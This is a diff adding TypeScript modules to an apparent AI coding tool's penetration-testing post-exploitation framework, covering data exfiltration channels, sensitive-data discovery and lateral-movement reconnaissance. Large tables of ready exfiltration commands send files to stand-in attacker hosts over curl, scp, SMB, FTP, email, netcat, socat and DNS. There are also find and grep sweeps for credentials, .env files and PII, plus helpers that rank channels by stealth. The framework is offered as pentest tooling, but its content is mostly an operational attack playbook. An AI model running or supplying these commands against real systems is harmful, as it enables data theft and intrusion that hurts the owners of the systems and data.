+        "certutil -urlcache -split -f https://attacker.com/upload file.txt",
+      ],
+      mitre: [PostExploitTypes.MITRE_EXFIL.HTTP],
+    },
+    https: {
+      name: "HTTPS (Encrypted)",
+      description: "Exfiltrate data via encrypted HTTPS requests",
+      bandwidth: "high",
+      detectionRisk: "low",
+      prerequisites: [
+        "Outbound HTTPS allowed",
+        "Attacker server with valid SSL",
+      ],
+      tools: ["curl", "wget", "PowerShell"],
+      commands: [
+        "# Same as HTTP but over HTTPS",
+        "# Content inspection is harder",
+        "curl -X POST --data-binary @/path/to/data https://attacker.com/exfil",
+      ],
+      mitre: [PostExploitTypes.MITRE_EXFIL.HTTPS],
+    },
+    ssh: {
+      name: "SSH/SCP/SFTP",
+      description: "Exfiltrate data via SSH-based file transfer",
+      bandwidth: "high",
+      detectionRisk: "low",
+      prerequisites: [
+        "Outbound SSH (port 22) allowed",
+        "SSH access to attacker server",
+      ],
+      tools: ["scp", "sftp", "rsync", "ssh"],
+      commands: [
+        "# SCP file transfer",
+        "scp /path/to/data user@attacker.com:/path/",
+        "",
+        "# SCP with non-standard port",
+        "scp -P 443 /path/to/data user@attacker.com:/path/",
+        "",
+        "# Rsync (incremental)",
+        "rsync -avz /path/to/data/ user@attacker.com:/path/",
+        "",
+        "# SSH tunnel + local forward",
+        "ssh -L 8080:localhost:80 user@attacker.com",
+        "",
+        "# SFTP",
+        "sftp user@attacker.com:/path/",
+      ],
+      mitre: [PostExploitTypes.MITRE_EXFIL.SSH],
+    },
+    smb: {
+      name: "SMB File Share",
+      description: "Exfiltrate via SMB to attacker-controlled share",
+      bandwidth: "high",
+      detectionRisk: "medium",
+      prerequisites: [
+        "Outbound SMB (port 445) allowed",
+        "Attacker-controlled SMB share",
+      ],
+      tools: ["smbclient", "net use", "copy"],
+      commands: [
+        "# Linux - smbclient",
+        "smbclient //attacker.com/share -U user%pass -c 'put /path/to/data'",
+        "",
+        "# Windows - net use",
+        "net use X: \\\\attacker.com\\share /user:user pass",
+        "copy C:\\path\\to\\data X:\\",
+        "net use X: /delete",
+        "",
+        "# PowerShell",
+        "Copy-Item C:\\path\\to\\data \\\\attacker.com\\share\\",
+      ],
+      mitre: ["T1021.002", "T1048"],
+    },
+    ftp: {
+      name: "FTP/SFTP",
+      description: "Exfiltrate via FTP file transfer",
+      bandwidth: "high",
+      detectionRisk: "medium",
+      prerequisites: [
+        "Outbound FTP (port 21) allowed",
+        "FTP server access",
+      ],
+      tools: ["ftp", "lftp", "curl"],
+      commands: [
+        "# Linux - ftp",
+        "ftp -n attacker.com <<END",
+        "user username password",
+        "put /path/to/data",
+        "quit",
+        "END",
+        "",
+        "# Curl FTP upload",
+        "curl -T /path/to/data ftp://user:pass@attacker.com/",
+      ],
+      mitre: ["T1048"],
+    },
+    sftp: {
+      name: "SFTP",
+      description: "Exfiltrate via encrypted SFTP",
+      bandwidth: "high",
+      detectionRisk: "low",
+      prerequisites: [
+        "Outbound SSH (port 22) allowed",
+        "SFTP server access",
+      ],
+      tools: ["sftp", "scp"],
+      commands: [
+        "# SFTP upload",
+        "sftp user@attacker.com",
+        "put /path/to/data",
+      ],
+      mitre: [PostExploitTypes.MITRE_EXFIL.SSH],
+    },
+    cloud_storage: {
+      name: "Cloud Storage",
+      description: "Exfiltrate to cloud storage services",
+      bandwidth: "high",
+      detectionRisk: "low",
+      prerequisites: [
+        "Outbound HTTPS allowed",
+        "Cloud storage account",
+      ],
+      tools: ["aws cli", "gsutil", "azcopy", "rclone"],
+      commands: [
+        "# AWS S3",
+        "aws s3 cp /path/to/data s3://bucket-name/",
+        "",
+        "# Google Cloud Storage",
+        "gsutil cp /path/to/data gs://bucket-name/",
+        "",
+        "# Azure Blob Storage",
+        "azcopy copy /path/to/data 'https://account.blob.core.windows.net/container?SAS'",
+        "",
+        "# Rclone (multiple providers)",
+        "rclone copy /path/to/data remote:bucket/",
+      ],
+      mitre: [PostExploitTypes.MITRE_EXFIL.CLOUD_STORAGE],
+    },
+    email: {
+      name: "Email",
+      description: "Exfiltrate data via email attachment",
+      bandwidth: "medium",
+      detectionRisk: "medium",
+      prerequisites: [
+        "Outbound SMTP or webmail access",
+        "Email account",
+      ],
+      tools: ["sendmail", "mail", "PowerShell"],
+      commands: [
+        "# Linux - mail command",
+        "cat /path/to/data | mail -s 'Subject' attacker@email.com",
+        "",
+        "# With attachment",
+        "mail -s 'Subject' -A /path/to/data attacker@email.com",
+        "",
+        "# PowerShell - Send-MailMessage",
+        "Send-MailMessage -To attacker@email.com -From user@domain.com -Subject 'Data' -Attachments C:\\data.zip -SmtpServer smtp.server.com",
+      ],
+      mitre: ["T1048.003"],
+    },
+    icmp: {
+      name: "ICMP Tunneling",
+      description: "Exfiltrate data via ICMP echo requests",
+      bandwidth: "low",
+      detectionRisk: "low",
+      prerequisites: [
+        "Outbound ICMP allowed",
+        "ICMP tunnel server",
+      ],
+      tools: ["icmpsh", "ptunnel", "icmptunnel"],
+      commands: [
+        "# Using ptunnel (server)",
+        "ptunnel -x password",
+        "",
+        "# Using ptunnel (client)",
+        "ptunnel -p proxy.server -lp 8000 -da dest.server -dp 22 -x password",
+        "",
+        "# icmpsh (listener)",
+        "python icmpsh_m.py attacker_ip victim_ip",
+      ],
+      mitre: ["T1048.003"],
+    },
+    custom_protocol: {
+      name: "Custom Protocol",
+      description: "Exfiltrate via custom protocol or port",
+      bandwidth: "medium",
+      detectionRisk: "low",
+      prerequisites: [
+        "Outbound access on chosen port",
+        "Custom listener",
+      ],
+      tools: ["netcat", "socat", "python"],
+      commands: [
+        "# Netcat listener (attacker)",
+        "nc -lvp 443 > received_data",
+        "",
+        "# Netcat sender (victim)",
+        "cat /path/to/data | nc attacker.com 443",
+        "",
+        "# Socat",
+        "socat TCP4:attacker.com:443 FILE:/path/to/data",
+      ],
+      mitre: ["T1048"],
+    },
+    steganography: {
+      name: "Steganography",
+      description: "Hide data in images or other files",
+      bandwidth: "low",
+      detectionRisk: "low",
+      prerequisites: [
+        "Ability to upload/download images",
+        "Steganography tools",
+      ],
+      tools: ["steghide", "openstego", "stegpy"],
+      commands: [
+        "# Hide data in image with steghide",
+        "steghide embed -cf image.jpg -ef secret.txt -p password",
+        "",
+        "# Extract hidden data",
+        "steghide extract -sf image.jpg -p password",
+      ],
+      mitre: ["T1027.003"],
+    },
+    physical: {
+      name: "Physical Media",
+      description: "Exfiltrate via USB or other physical media",
+      bandwidth: "high",
+      detectionRisk: "high",
+      prerequisites: [
+        "Physical access",
+        "USB/removable media allowed",
+      ],
+      tools: ["cp", "robocopy", "xcopy"],
+      commands: [
+        "# Linux - copy to USB",
+        "cp -r /path/to/data /media/usb/",
+        "",
+        "# Windows - robocopy",
+        "robocopy C:\\path\\to\\data E:\\ /E",
+      ],
+      mitre: ["T1052.001"],
+    },
+  }
+
+  /**
+   * Get channel details.
+   */
+  export function getChannel(type: PostExploitTypes.ExfilChannelType) {
+    return CHANNELS[type]
+  }
+
+  /**
+   * Create an exfil channel entry.
+   */
+  export function createChannel(
+    type: PostExploitTypes.ExfilChannelType,
+    options?: {
+      available?: boolean
+      notes?: string
+    }
+  ): Omit<PostExploitTypes.ExfilChannel, "id" | "analyzedAt"> {
+    const channel = CHANNELS[type]
+
+    return {
+      type,
+      name: channel.name,
+      description: channel.description,
+      available: options?.available ?? false,
+      bandwidth: channel.bandwidth,
+      detectionRisk: channel.detectionRisk,
+      commands: channel.commands,
+      tools: channel.tools,
+      prerequisites: channel.prerequisites,
+      mitre: channel.mitre,
+      notes: options?.notes,
+    }
+  }
+
+  /**
+   * Get channels by detection risk.
+   */
+  export function getChannelsByRisk(
+    maxRisk: PostExploitTypes.DetectionRisk
+  ): PostExploitTypes.ExfilChannelType[] {
+    const riskOrder = { low: 0, medium: 1, high: 2 }
+    return (Object.entries(CHANNELS) as [PostExploitTypes.ExfilChannelType, typeof CHANNELS[keyof typeof CHANNELS]][])
+      .filter(([_, info]) => riskOrder[info.detectionRisk] <= riskOrder[maxRisk])
+      .map(([type]) => type)
+  }
+
+  /**
+   * Get channels by bandwidth.
+   */
+  export function getChannelsByBandwidth(
+    minBandwidth: "low" | "medium" | "high"
+  ): PostExploitTypes.ExfilChannelType[] {
+    const bwOrder = { low: 0, medium: 1, high: 2 }
+    return (Object.entries(CHANNELS) as [PostExploitTypes.ExfilChannelType, typeof CHANNELS[keyof typeof CHANNELS]][])
+      .filter(([_, info]) => bwOrder[info.bandwidth] >= bwOrder[minBandwidth])
+      .map(([type]) => type)
+  }
+
+  /**
+   * Format channels for display.
+   */
+  export function formatChannels(channels: PostExploitTypes.ExfilChannel[]): string {
+    if (channels.length === 0) {
+      return "No exfiltration channels analyzed."
+    }
+
+    const lines: string[] = []
+    lines.push(`Analyzed ${channels.length} exfiltration channel(s):`)
+    lines.push("")
+
+    for (const channel of channels) {
+      const status = channel.available ? "[+]" : "[-]"
+      const bw = channel.bandwidth === "high" ? "H" :
+                 channel.bandwidth === "medium" ? "M" : "L"
+      const det = channel.detectionRisk === "low" ? "L" :
+                  channel.detectionRisk === "medium" ? "M" : "H"
+
+      lines.push(`${status} ${channel.name} (BW:${bw} DET:${det})`)
+      lines.push(`    ${channel.description}`)
+      if (channel.notes) {
+        lines.push(`    Note: ${channel.notes}`)
+      }
+    }
+
+    lines.push("")
+    lines.push("Legend: [+] available, [-] not available")
+    lines.push("BW = Bandwidth (H/M/L), DET = Detection Risk (H/M/L)")
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get recommended channels.
+   */
+  export function getRecommendations(context: {
+    dataSize: "small" | "medium" | "large"
+    stealth: boolean
+  }): PostExploitTypes.ExfilChannelType[] {
+    if (context.stealth) {
+      if (context.dataSize === "small") {
+        return ["dns", "icmp"]
+      } else {
+        return ["https", "cloud_storage", "ssh"]
+      }
+    } else {
+      if (context.dataSize === "large") {
+        return ["ssh", "smb", "cloud_storage", "https"]
+      } else {
+        return ["https", "ssh", "http"]
+      }
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/exfil/index.ts b/packages/opencode/src/pentest/postexploit/exfil/index.ts
new file mode 100644
index 00000000000..891bb9b435d
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/exfil/index.ts
@@ -0,0 +1,150 @@
+/**
+ * @fileoverview Data Exfiltration Module
+ *
+ * Exports for data target discovery and exfiltration channel analysis.
+ *
+ * @module pentest/postexploit/exfil
+ */
+
+export { DataTargets } from "./targets"
+export { ExfilChannels } from "./channels"
+
+import { DataTargets } from "./targets"
+import { ExfilChannels } from "./channels"
+import { PostExploitTypes } from "../types"
+
+/**
+ * Unified exfiltration interface.
+ */
+export namespace Exfil {
+  /**
+   * Get data discovery commands for a platform.
+   */
+  export function getDiscoveryCommands(platform: PostExploitTypes.Platform): string[] {
+    if (platform === "linux") {
+      return DataTargets.getLinuxDiscoveryCommands()
+    } else {
+      return DataTargets.getWindowsDiscoveryCommands()
+    }
+  }
+
+  /**
+   * Create a data target entry.
+   */
+  export function createTarget(
+    type: PostExploitTypes.DataTargetType,
+    path: string,
+    host: string,
+    options?: {
+      description?: string
+      sensitivity?: PostExploitTypes.DataSensitivity
+      sizeEstimate?: string
+      accessible?: boolean
+    }
+  ): Omit<PostExploitTypes.DataTarget, "id" | "discoveredAt"> {
+    return DataTargets.createDataTarget(type, path, host, options)
+  }
+
+  /**
+   * Create an exfil channel entry.
+   */
+  export function createChannel(
+    type: PostExploitTypes.ExfilChannelType,
+    options?: {
+      available?: boolean
+      notes?: string
+    }
+  ): Omit<PostExploitTypes.ExfilChannel, "id" | "analyzedAt"> {
+    return ExfilChannels.createChannel(type, options)
+  }
+
+  /**
+   * Get channel details.
+   */
+  export function getChannelDetails(type: PostExploitTypes.ExfilChannelType) {
+    return ExfilChannels.getChannel(type)
+  }
+
+  /**
+   * Get recommended channels based on context.
+   */
+  export function getRecommendedChannels(context: {
+    dataSize: "small" | "medium" | "large"
+    stealth: boolean
+  }): PostExploitTypes.ExfilChannelType[] {
+    return ExfilChannels.getRecommendations(context)
+  }
+
+  /**
+   * Get stealthy exfil channels.
+   */
+  export function getStealthyChannels(): PostExploitTypes.ExfilChannelType[] {
+    return ExfilChannels.getChannelsByRisk("low")
+  }
+
+  /**
+   * Get high-bandwidth channels.
+   */
+  export function getHighBandwidthChannels(): PostExploitTypes.ExfilChannelType[] {
+    return ExfilChannels.getChannelsByBandwidth("high")
+  }
+
+  /**
+   * Format targets for display.
+   */
+  export function formatTargets(targets: PostExploitTypes.DataTarget[]): string {
+    return DataTargets.formatTargets(targets)
+  }
+
+  /**
+   * Format channels for display.
+   */
+  export function formatChannels(channels: PostExploitTypes.ExfilChannel[]): string {
+    return ExfilChannels.formatChannels(channels)
+  }
+
+  /**
+   * Get high-value data types.
+   */
+  export function getHighValueTargetTypes(): PostExploitTypes.DataTargetType[] {
+    return DataTargets.getHighValueTypes()
+  }
+
+  /**
+   * Get quick reference for exfiltration.
+   */
+  export function getQuickReference(): string {
+    const lines: string[] = []
+    lines.push("DATA EXFILTRATION QUICK REFERENCE")
+    lines.push("==================================")
+    lines.push("")
+    lines.push("High-Value Data Types:")
+    for (const type of DataTargets.getHighValueTypes()) {
+      lines.push(`  - ${type}`)
+    }
+    lines.push("")
+    lines.push("Stealthy Channels (low detection):")
+    for (const ch of ExfilChannels.getChannelsByRisk("low")) {
+      const info = ExfilChannels.getChannel(ch)
+      lines.push(`  - ${info.name} (${info.bandwidth} bandwidth)`)
+    }
+    lines.push("")
+    lines.push("High-Bandwidth Channels:")
+    for (const ch of ExfilChannels.getChannelsByBandwidth("high")) {
+      const info = ExfilChannels.getChannel(ch)
+      lines.push(`  - ${info.name} (${info.detectionRisk} detection)`)
+    }
+    lines.push("")
+    lines.push("Quick Exfil Commands:")
+    lines.push("  # HTTPS (curl)")
+    lines.push("  cat data | base64 | curl -X POST -d @- https://server/exfil")
+    lines.push("")
+    lines.push("  # SSH/SCP")
+    lines.push("  scp data user@server:/path/")
+    lines.push("")
+    lines.push("  # DNS (small data)")
+    lines.push("  nslookup $(echo data | base64).exfil.domain.com")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/exfil/targets.ts b/packages/opencode/src/pentest/postexploit/exfil/targets.ts
new file mode 100644
index 00000000000..09f7e90e80f
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/exfil/targets.ts
@@ -0,0 +1,307 @@
+/**
+ * @fileoverview Data Target Discovery
+ *
+ * Provides guidance for discovering sensitive data targets including
+ * databases, documents, configurations, and other valuable data.
+ *
+ * @module pentest/postexploit/exfil/targets
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Data target discovery namespace.
+ */
+export namespace DataTargets {
+  /**
+   * Sensitive data patterns by type.
+   */
+  export const DATA_PATTERNS: Record<PostExploitTypes.DataTargetType, {
+    description: string
+    filePatterns: string[]
+    contentPatterns: RegExp[]
+    locations: {
+      linux: string[]
+      windows: string[]
+    }
+    sensitivity: PostExploitTypes.DataSensitivity
+  }> = {
+    pii: {
+      description: "Personally Identifiable Information",
+      filePatterns: ["*customer*", "*user*", "*employee*", "*contact*", "*person*"],
+      contentPatterns: [
+        /\b\d{3}-\d{2}-\d{4}\b/, // SSN
+        /\b[A-Z]{1,2}\d{6,9}\b/, // Passport
+        /\b\d{16}\b/, // Credit card (basic)
+      ],
+      locations: {
+        linux: ["/var/www/", "/opt/", "/home/*/"],
+        windows: ["C:\\inetpub\\", "C:\\Users\\*\\Documents\\"],
+      },
+      sensitivity: "confidential",
+    },
+    phi: {
+      description: "Protected Health Information",
+      filePatterns: ["*medical*", "*health*", "*patient*", "*diagnosis*"],
+      contentPatterns: [
+        /\b[A-Z]{3}\d{7}\b/, // Medical record numbers
+        /\bICD-\d{2}\b/, // ICD codes
+      ],
+      locations: {
+        linux: ["/var/www/", "/opt/"],
+        windows: ["C:\\Program Files\\*\\", "C:\\inetpub\\"],
+      },
+      sensitivity: "confidential",
+    },
+    financial: {
+      description: "Financial Data",
+      filePatterns: ["*invoice*", "*payment*", "*account*", "*transaction*", "*bank*"],
+      contentPatterns: [
+        /\b\d{4}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b/, // Credit card
+        /\b[A-Z]{2}\d{2}[A-Z0-9]{4}\d{7}[A-Z0-9]{0,16}\b/, // IBAN
+      ],
+      locations: {
+        linux: ["/var/www/", "/opt/", "/home/*/"],
+        windows: ["C:\\Users\\*\\Documents\\", "C:\\Shares\\"],
+      },
+      sensitivity: "confidential",
+    },
+    credentials: {
+      description: "Credentials and Secrets",
+      filePatterns: ["*password*", "*credential*", "*secret*", "*.key", "*.pem", ".env*"],
+      contentPatterns: [
+        /password\s*[=:]\s*\S+/i,
+        /api[_-]?key\s*[=:]\s*\S+/i,
+        /secret\s*[=:]\s*\S+/i,
+        /token\s*[=:]\s*\S+/i,
+      ],
+      locations: {
+        linux: ["/etc/", "/var/www/", "/opt/", "/home/*/"],
+        windows: ["C:\\inetpub\\", "C:\\Program Files\\*\\", "C:\\Users\\*\\"],
+      },
+      sensitivity: "secret",
+    },
+    source_code: {
+      description: "Source Code",
+      filePatterns: ["*.py", "*.js", "*.java", "*.cs", "*.cpp", "*.go", "*.rb"],
+      contentPatterns: [],
+      locations: {
+        linux: ["/var/www/", "/opt/", "/home/*/", "/srv/"],
+        windows: ["C:\\inetpub\\", "C:\\Users\\*\\source\\", "C:\\Projects\\"],
+      },
+      sensitivity: "internal",
+    },
+    configuration: {
+      description: "Configuration Files",
+      filePatterns: ["*.conf", "*.config", "*.ini", "*.xml", "*.yaml", "*.yml", "*.json"],
+      contentPatterns: [],
+      locations: {
+        linux: ["/etc/", "/opt/", "/var/www/"],
+        windows: ["C:\\Windows\\System32\\config\\", "C:\\Program Files\\*\\", "C:\\inetpub\\"],
+      },
+      sensitivity: "internal",
+    },
+    database: {
+      description: "Database Files",
+      filePatterns: ["*.sql", "*.db", "*.sqlite", "*.mdb", "*.accdb", "*.bak"],
+      contentPatterns: [],
+      locations: {
+        linux: ["/var/lib/mysql/", "/var/lib/postgresql/", "/opt/"],
+        windows: ["C:\\Program Files\\Microsoft SQL Server\\", "C:\\Database\\"],
+      },
+      sensitivity: "confidential",
+    },
+    documents: {
+      description: "Documents",
+      filePatterns: ["*.doc*", "*.xls*", "*.ppt*", "*.pdf", "*.odt", "*.ods"],
+      contentPatterns: [],
+      locations: {
+        linux: ["/home/*/Documents/", "/opt/", "/srv/"],
+        windows: ["C:\\Users\\*\\Documents\\", "C:\\Shares\\"],
+      },
+      sensitivity: "internal",
+    },
+    emails: {
+      description: "Email Data",
+      filePatterns: ["*.pst", "*.ost", "*.eml", "*.msg", "*.mbox"],
+      contentPatterns: [],
+      locations: {
+        linux: ["/var/mail/", "/home/*/"],
+        windows: ["C:\\Users\\*\\AppData\\Local\\Microsoft\\Outlook\\"],
+      },
+      sensitivity: "confidential",
+    },
+    intellectual_property: {
+      description: "Intellectual Property",
+      filePatterns: ["*patent*", "*design*", "*spec*", "*blueprint*", "*schematic*"],
+      contentPatterns: [],
+      locations: {
+        linux: ["/opt/", "/srv/", "/home/*/"],
+        windows: ["C:\\Users\\*\\Documents\\", "C:\\Projects\\", "C:\\Shares\\"],
+      },
+      sensitivity: "secret",
+    },
+    security_data: {
+      description: "Security Data",
+      filePatterns: ["*.log", "*audit*", "*security*", "*alert*", "*incident*"],
+      contentPatterns: [],
+      locations: {
+        linux: ["/var/log/", "/var/log/audit/"],
+        windows: ["C:\\Windows\\System32\\winevt\\Logs\\", "C:\\Logs\\"],
+      },
+      sensitivity: "confidential",
+    },
+    backup: {
+      description: "Backup Files",
+      filePatterns: ["*.bak", "*.backup", "*.old", "*.tar*", "*.zip", "*.7z"],
+      contentPatterns: [],
+      locations: {
+        linux: ["/backup/", "/var/backup/", "/opt/backup/"],
+        windows: ["C:\\Backup\\", "D:\\Backup\\", "\\\\*\\backup$"],
+      },
+      sensitivity: "confidential",
+    },
+  }
+
+  /**
+   * Get discovery commands for Linux.
+   */
+  export function getLinuxDiscoveryCommands(): string[] {
+    return [
+      "# Find sensitive files by name",
+      "find / -name '*.env' -o -name '*password*' -o -name '*secret*' 2>/dev/null | head -50",
+      "",
+      "# Find database files",
+      "find / -name '*.sql' -o -name '*.db' -o -name '*.sqlite' 2>/dev/null | head -50",
+      "",
+      "# Find configuration files",
+      "find /etc /opt /var/www -name '*.conf' -o -name '*.config' 2>/dev/null | head -50",
+      "",
+      "# Find documents",
+      "find /home /opt -name '*.pdf' -o -name '*.doc*' -o -name '*.xls*' 2>/dev/null | head -50",
+      "",
+      "# Search for sensitive content",
+      "grep -r -l -i 'password\\|secret\\|api_key' /var/www /opt 2>/dev/null | head -20",
+      "",
+      "# Find recently modified files",
+      "find / -type f -mtime -7 -size +1M 2>/dev/null | head -50",
+      "",
+      "# Database discovery",
+      "ls -la /var/lib/mysql/ /var/lib/postgresql/ 2>/dev/null",
+      "",
+      "# Web application data",
+      "ls -la /var/www/*/",
+    ]
+  }
+
+  /**
+   * Get discovery commands for Windows.
+   */
+  export function getWindowsDiscoveryCommands(): string[] {
+    return [
+      "# Find sensitive files",
+      'dir /s /b C:\\*.env C:\\*password* C:\\*secret* 2>nul | findstr /v "Windows\\WinSxS"',
+      "",
+      "# Find database files",
+      "dir /s /b C:\\*.sql C:\\*.db C:\\*.sqlite C:\\*.bak 2>nul",
+      "",
+      "# Find documents",
+      'dir /s /b C:\\Users\\*\\Documents\\*.doc* C:\\Users\\*\\Documents\\*.xls* C:\\Users\\*\\Documents\\*.pdf 2>nul',
+      "",
+      "# Search for sensitive content (PowerShell)",
+      'Get-ChildItem -Path C:\\ -Recurse -Include *.txt,*.config,*.xml -ErrorAction SilentlyContinue | Select-String -Pattern "password|secret|api" | Select-Object -First 20',
+      "",
+      "# Find recently modified files",
+      "forfiles /P C:\\ /S /D -7 /C \"cmd /c if @fsize GTR 1000000 echo @path\"",
+      "",
+      "# Outlook data files",
+      'dir /s /b C:\\Users\\*.pst C:\\Users\\*.ost 2>nul',
+      "",
+      "# Network shares",
+      "net share",
+      "net view \\\\localhost",
+      "",
+      "# SQL Server databases",
+      "sqlcmd -S localhost -Q \"SELECT name FROM sys.databases\" 2>nul",
+    ]
+  }
+
+  /**
+   * Create a data target entry.
+   */
+  export function createDataTarget(
+    type: PostExploitTypes.DataTargetType,
+    path: string,
+    host: string,
+    options?: {
+      description?: string
+      sensitivity?: PostExploitTypes.DataSensitivity
+      sizeEstimate?: string
+      accessible?: boolean
+    }
+  ): Omit<PostExploitTypes.DataTarget, "id" | "discoveredAt"> {
+    const pattern = DATA_PATTERNS[type]
+
+    return {
+      type,
+      path,
+      host,
+      description: options?.description || pattern.description,
+      sensitivity: options?.sensitivity || pattern.sensitivity,
+      sizeEstimate: options?.sizeEstimate,
+      accessLevel: "user",
+      accessible: options?.accessible ?? false,
+      patterns: pattern.filePatterns,
+      mitre: ["T1005", "T1039", "T1213"], // Data from local/network/information repos
+      notes: undefined,
+    }
+  }
+
+  /**
+   * Format discovered targets for display.
+   */
+  export function formatTargets(targets: PostExploitTypes.DataTarget[]): string {
+    if (targets.length === 0) {
+      return "No data targets discovered."
+    }
+
+    const lines: string[] = []
+    lines.push(`Discovered ${targets.length} data target(s):`)
+    lines.push("")
+
+    // Group by sensitivity
+    const bySensitivity: Record<string, PostExploitTypes.DataTarget[]> = {}
+    for (const target of targets) {
+      const key = target.sensitivity
+      if (!bySensitivity[key]) bySensitivity[key] = []
+      bySensitivity[key].push(target)
+    }
+
+    const sensitivityOrder = ["top_secret", "secret", "confidential", "internal", "public"]
+    for (const sens of sensitivityOrder) {
+      const group = bySensitivity[sens]
+      if (!group || group.length === 0) continue
+
+      lines.push(`[${sens.toUpperCase()}]`)
+      for (const target of group) {
+        const access = target.accessible ? "[+]" : "[-]"
+        lines.push(`  ${access} ${target.type}: ${target.path}`)
+        if (target.sizeEstimate) {
+          lines.push(`      Size: ~${target.sizeEstimate}`)
+        }
+      }
+      lines.push("")
+    }
+
+    lines.push("Legend: [+] accessible, [-] not accessible")
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get high-value target types.
+   */
+  export function getHighValueTypes(): PostExploitTypes.DataTargetType[] {
+    return ["credentials", "database", "financial", "pii", "intellectual_property"]
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/index.ts b/packages/opencode/src/pentest/postexploit/index.ts
new file mode 100644
index 00000000000..e3c8a437283
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/index.ts
@@ -0,0 +1,44 @@
+/**
+ * @fileoverview Post-Exploitation Framework
+ *
+ * Comprehensive post-exploitation guidance module providing privilege escalation,
+ * lateral movement, credential harvesting, persistence, data exfiltration,
+ * and cleanup assistance for penetration testing.
+ *
+ * @module pentest/postexploit
+ */
+
+// Core exports
+export { PostExploitTypes } from "./types"
+export { PostExploitEvents } from "./events"
+export { PostExploitStorage, type StorageConfig } from "./storage"
+export { PostExploitProfiles } from "./profiles"
+export { PostExploitOrchestrator } from "./orchestrator"
+export { PostExploitTool } from "./tool"
+
+// Module exports
+export { Privesc, LinuxPrivesc, WindowsPrivesc } from "./privesc"
+export { Lateral, LateralDiscovery, LateralMethods, LateralPaths } from "./lateral"
+export { Creds, CredentialDiscovery, LinuxCreds, WindowsCreds } from "./creds"
+export { Persistence, PersistenceCatalog, LinuxPersistence, WindowsPersistence } from "./persistence"
+export { Exfil, DataTargets, ExfilChannels } from "./exfil"
+export { Cleanup, ArtifactTracking, LogCleanup, CleanupChecklist } from "./cleanup"
+export { Parsers, LinPEASParser, WinPEASParser } from "./parsers"
+
+// Re-export key types for convenience
+import { PostExploitTypes } from "./types"
+export type Platform = PostExploitTypes.Platform
+export type ProfileId = PostExploitTypes.ProfileId
+export type Severity = PostExploitTypes.Severity
+export type DetectionRisk = PostExploitTypes.DetectionRisk
+export type PrivescVector = PostExploitTypes.PrivescVector
+export type LateralTarget = PostExploitTypes.LateralTarget
+export type LateralPath = PostExploitTypes.LateralPath
+export type HarvestedCredential = PostExploitTypes.HarvestedCredential
+export type CredentialLocation = PostExploitTypes.CredentialLocation
+export type PersistenceMechanism = PostExploitTypes.PersistenceMechanism
+export type DataTarget = PostExploitTypes.DataTarget
+export type ExfilChannel = PostExploitTypes.ExfilChannel
+export type Artifact = PostExploitTypes.Artifact
+export type PostExploitSession = PostExploitTypes.PostExploitSession
+export type AssessmentProfile = PostExploitTypes.AssessmentProfile
diff --git a/packages/opencode/src/pentest/postexploit/lateral/discovery.ts b/packages/opencode/src/pentest/postexploit/lateral/discovery.ts
new file mode 100644
index 00000000000..5db1962a294
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/lateral/discovery.ts
@@ -0,0 +1,330 @@
+/**
+ * @fileoverview Lateral Movement Target Discovery
+ *
+ * Provides guidance for discovering potential lateral movement targets
+ * including network hosts, services, shares, and trust relationships.
+ *
+ * @module pentest/postexploit/lateral/discovery
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Lateral movement target discovery namespace.
+ */
+export namespace LateralDiscovery {
+  /**
+   * Ports indicating lateral movement potential.
+   */
+  export const LATERAL_MOVEMENT_PORTS: Record<number, {
+    service: string
+    methods: PostExploitTypes.LateralMethod[]
+    description: string
+  }> = {
+    22: {
+      service: "SSH",
+      methods: ["ssh"],
+      description: "SSH for Linux/Unix lateral movement",
+    },
+    135: {
+      service: "RPC",
+      methods: ["wmi", "dcom"],
+      description: "Windows RPC for WMI/DCOM execution",
+    },
+    139: {
+      service: "NetBIOS",
+      methods: ["smb"],
+      description: "SMB over NetBIOS for file shares",
+    },
+    445: {
+      service: "SMB",
+      methods: ["smb", "psexec", "smbexec", "pass_the_hash"],
+      description: "SMB for file shares and remote execution",
+    },
+    3389: {
+      service: "RDP",
+      methods: ["rdp"],
+      description: "Remote Desktop Protocol",
+    },
+    5985: {
+      service: "WinRM HTTP",
+      methods: ["winrm", "psremoting"],
+      description: "Windows Remote Management (HTTP)",
+    },
+    5986: {
+      service: "WinRM HTTPS",
+      methods: ["winrm", "psremoting"],
+      description: "Windows Remote Management (HTTPS)",
+    },
+  }
+
+  /**
+   * Generate network discovery commands for Linux.
+   */
+  export function getLinuxDiscoveryCommands(): string[] {
+    return [
+      "# ARP table (local network)",
+      "arp -a",
+      "ip neigh",
+      "",
+      "# Network interfaces",
+      "ip addr",
+      "ifconfig -a",
+      "",
+      "# Routing table",
+      "ip route",
+      "route -n",
+      "",
+      "# Active connections",
+      "netstat -antup",
+      "ss -antup",
+      "",
+      "# DNS resolution",
+      "cat /etc/resolv.conf",
+      "cat /etc/hosts",
+      "",
+      "# Discover hosts on subnet",
+      "# Using ping sweep",
+      "for i in $(seq 1 254); do (ping -c 1 192.168.1.$i | grep 'bytes from' &); done",
+      "",
+      "# Using nmap (if available)",
+      "nmap -sn 192.168.1.0/24",
+      "",
+      "# SSH known hosts",
+      "cat ~/.ssh/known_hosts 2>/dev/null",
+      "",
+      "# SSH config hosts",
+      "cat ~/.ssh/config 2>/dev/null | grep -i 'host\\|hostname'",
+      "",
+      "# History for SSH commands",
+      "history | grep -i ssh",
+      "cat ~/.bash_history | grep -i ssh",
+    ]
+  }
+
+  /**
+   * Generate network discovery commands for Windows.
+   */
+  export function getWindowsDiscoveryCommands(): string[] {
+    return [
+      "# ARP table",
+      "arp -a",
+      "",
+      "# Network interfaces",
+      "ipconfig /all",
+      "",
+      "# Routing table",
+      "route print",
+      "",
+      "# Active connections",
+      "netstat -ano",
+      "",
+      "# DNS cache",
+      "ipconfig /displaydns",
+      "",
+      "# Hosts file",
+      "type C:\\Windows\\System32\\drivers\\etc\\hosts",
+      "",
+      "# Domain computers (if domain-joined)",
+      "net view /domain",
+      "net view",
